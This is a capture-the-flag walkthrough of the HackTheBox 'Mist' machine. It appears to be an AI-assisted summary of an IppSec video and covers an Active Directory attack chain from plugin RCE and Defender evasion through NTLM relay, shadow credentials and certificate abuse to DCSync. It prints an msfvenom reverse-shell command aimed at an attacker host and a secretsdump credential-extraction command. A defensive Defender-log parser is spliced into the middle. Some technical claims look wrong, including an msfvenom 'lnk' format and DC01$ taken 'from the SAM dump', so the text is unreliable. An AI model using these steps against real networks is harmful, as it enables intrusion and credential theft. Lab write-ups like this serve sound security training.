HackTheBox - Mist

Published on Oct 27, 2024
This response is partially generated with the help of AI. It may contain inaccuracies.

Introduction

This tutorial provides a step-by-step guide based on the HackTheBox - Mist video by IppSec. It covers exploiting the initial web vulnerability, obtaining remote code execution (RCE), and using tools such as BloodHound, Certipy, and Impacket to move through the Active Directory environment. Each step outlines the practical actions and tips needed to follow the process.

Step 1: Perform Initial Scanning with Nmap

  • Start by running an Nmap scan to identify open ports and services on the target machine.
  • Use the following command to scan for service versions:
    nmap -sV <target_ip>

  • Look for service versions that may indicate known vulnerabilities, such as the Pluck CMS version shown in the video.

Step 2: Investigate Vulnerabilities

  • Research any identified vulnerabilities, such as CVE-2024-9405 (File Disclosure).
  • Cross-reference the CVE database to understand the implications and potential exploits.

Step 3: Cracking Passwords and Uploading Malicious Plugins

  • Discover backup passwords from the target.
  • Use a password cracker (e.g., John the Ripper) to crack the password.
  • Upload a malicious plugin to gain RCE:
    • Ensure the plugin is designed to execute arbitrary commands.

Step 4: Bypass Defender's Reverse Shell Protection

  • If the reverse shell is blocked, obfuscate your command to evade detection.
  • Use techniques like URL encoding or command splitting.

Step 5: Create a Malicious LNK File

  • Develop a malicious LNK file that, when clicked, provides a shell.
  • Use tools like msfvenom to create the LNK file:
    msfvenom -p windows/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f lnk -o malicious.lnk
    

Step 6: Set Up Bloodhound

  • Install BloodHound Community Edition to visualize the Active Directory environment.
  • Fix any bugs preventing images from displaying.
  • Use BloodHound to identify certificate templates the current user can enroll in.

Step 7: Discover Defender Exclusions

  • As a low-privilege user, read the Windows Defender operational event log (Event ID 5007, "configuration has changed") to find the Defender exclusions configured on the host.
  • This information can help you strategize your attacks.
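The same event that leaks exclusions to an attacker is what a defender should be watching. The following is an added example, not code from the video or this write-up: it assumes the Defender operational log name and the "Old value: / New value:" layout of the 5007 message, and parses those events into a list of exclusion additions and removals.

```powershell
# Added example, not from IppSec's video or the write-up. It assumes the Defender operational
# log name and the "Old value: / New value:" layout of the Event ID 5007 message text.
function ConvertFrom-DefenderConfigEvent {
    param([datetime]$TimeCreated, [string]$Message)
    # Pull the registry value shown after "Old value:" and "New value:" (either may be empty)
    $old = if ($Message -match 'Old value:\s*(?<v>[^\r\n]*)') { $Matches['v'].Trim() } else { '' }
    $new = if ($Message -match 'New value:\s*(?<v>[^\r\n]*)') { $Matches['v'].Trim() } else { '' }
    # Only exclusion keys are of interest here; other 5007 events (e.g. scan settings) are skipped
    $pattern = '\\Exclusions\\(?<kind>Paths|Extensions|Processes|IpAddresses)\\(?<item>.+?)\s*=\s*0x'
    if ($new -match $pattern) {
        $kind = $Matches['kind']; $item = $Matches['item']
        $action = if ($old -match $pattern) { 'Modified' } else { 'Added' }
    } elseif ($old -match $pattern) {
        $kind = $Matches['kind']; $item = $Matches['item']; $action = 'Removed'
    } else {
        return $null
    }
    [pscustomobject]@{ TimeCreated = $TimeCreated; Action = $action; Kind = $kind; Item = $item }
}

function Get-DefenderExclusionChange {
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-DefenderConfigEvent -TimeCreated $_.TimeCreated -Message $_.Message } |
        Where-Object { $null -ne $_ }
}

# Constructed sample message (not a real capture) so the parser can be exercised offline
$sample = @"
Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
	Old value: 
	New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Tools = 0x0
"@
ConvertFrom-DefenderConfigEvent -TimeCreated (Get-Date) -Message $sample | Format-List

# Live query on the local host; an unexpected path or process exclusion here is worth an alert
Get-DefenderExclusionChange | Format-Table -AutoSize
```

Forwarding this log to a SIEM and alerting on any Added or Modified row outside change windows turns the exclusion list from a quiet gift to an intruder into a tripwire.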

Step 8: Request Certificates Using Certify

  • Use Certify to request a certificate for your user.
  • Then, utilize Rubeus to perform a pass-the-ticket attack to obtain NTLM hashes.

Step 9: Execute NTLM Relay Attacks

  • Install Impacket with the necessary version for shadow credentials in LDAP.
  • Set up ntlmrelayx to forward connections to the Domain Controller’s LDAP.

Step 10: Use PetitPotam for Authentication

  • Utilize PetitPotam with the hash of the user (e.g., Brandon) to coerce authentication from MS01$.
  • Ensure the WebClient service is running on the target, since the coercion relies on it.

Step 11: Shadow Credentials and Impersonation

  • Set shadow credentials for MS01$.
  • Use S4U to impersonate an administrator and access the filesystem.
  • Dump local hashes from the retrieved registry hives using the secretsdump tool (LOCAL tells it to parse the offline files rather than connect to a host):
    secretsdump.py -sam <sam_file> -system <system_file> -ntds <ntds_file> LOCAL


Step 12: Cracking the KeePass Database

  • Locate a KeePass database in the target's directory and use tools to crack its master password.

Step 13: Analyze Permissions with Bloodhound

  • Return to BloodHound to check whether OP_SHARON.MULLARD can read gMSA passwords.
  • Use nxc to dump SVC_CA$ credentials.

Step 14: Chain Privilege Escalation

  • Investigate what SVC_CA$ can do and find a method to jump through groups to access the Backup Service.

Step 15: Set Shadow Credentials for SVC_CABACKUP

  • Use PyWhisker to set shadow credentials on SVC_CABACKUP.
  • Use PKINITTools to obtain the NTHASH of SVC_CABACKUP.

Step 16: Create Certificates with Certipy

  • Use Certipy to create a certificate for ManagerAuthentication to join the Certificate Managers Group.
  • Also, create a certificate for BackupSvcAuthentication to join the ServiceAccounts Group.

Step 17: Dump the Domain Controller Registry

  • Use Impacket to dump the registry of the Domain Controller and grab the DC01$ password.
  • If facing issues with SMB server writing, write to SYSVOL, then copy to the web server.

Step 18: Use Secretsdump for Final Credential Extraction

  • Finally, grab the DC01$ password with secretsdump from the SAM dump.
  • Use this password to run DCSync and retrieve the MIST.HTB\Administrator account credentials.

Conclusion

In this tutorial, we've covered a series of steps to exploit vulnerabilities, escalate privileges, and extract sensitive information from a target system. Each step builds on the previous one, demonstrating a methodical approach to penetration testing. As you practice these techniques, always ensure you're operating within legal boundaries and ethical guidelines.